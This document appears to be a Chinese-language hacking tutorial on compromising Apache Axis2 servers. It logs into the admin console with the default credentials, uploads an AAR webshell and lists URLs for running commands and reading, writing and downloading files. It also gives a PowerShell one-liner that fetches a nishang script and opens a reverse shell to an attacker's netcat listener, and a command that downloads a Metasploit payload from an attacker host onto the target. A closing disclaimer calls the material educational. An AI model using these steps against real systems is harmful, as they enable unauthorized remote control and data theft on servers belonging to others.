上傳aar包獲取webshell
- 默認弱口令進入axis2控制台
http://ip:port/axis2/axis2-admin/login
默認口令密碼
admin
axis2
- aar包,使用方法
支持的命令?
exec-運行命令,在Linux / Windows上均可使用,不用擔心。
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=dir%20C:
寫-寫文件
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
info-顯示某些信息,根據需要進行修改
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
讀取-讀取文件內容
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
下載-下載文件並將其保存在某處
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt
windows命令行反彈shell
利用aarwebshell執行powershell反彈命令,攻擊端nc監聽
nc -lvp 6666
http://ip:port/axis2/services/AxisInvoker/exec?cmd=powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress yourip -port 6666
植入metasploit反彈shell
將msf生成shellcode存放網站目錄——>利用目標服務器powershell下載——>執行shell,反彈成功
powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip/shell1.exe','C:\Program Files\Apache Software Foundation\Tomcat 7.0\system.exe')
參考鏈接
windows命令行反彈shell(一)
windows命令下載大全
CaledoniaProject/AxisInvoker
聲明
嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合!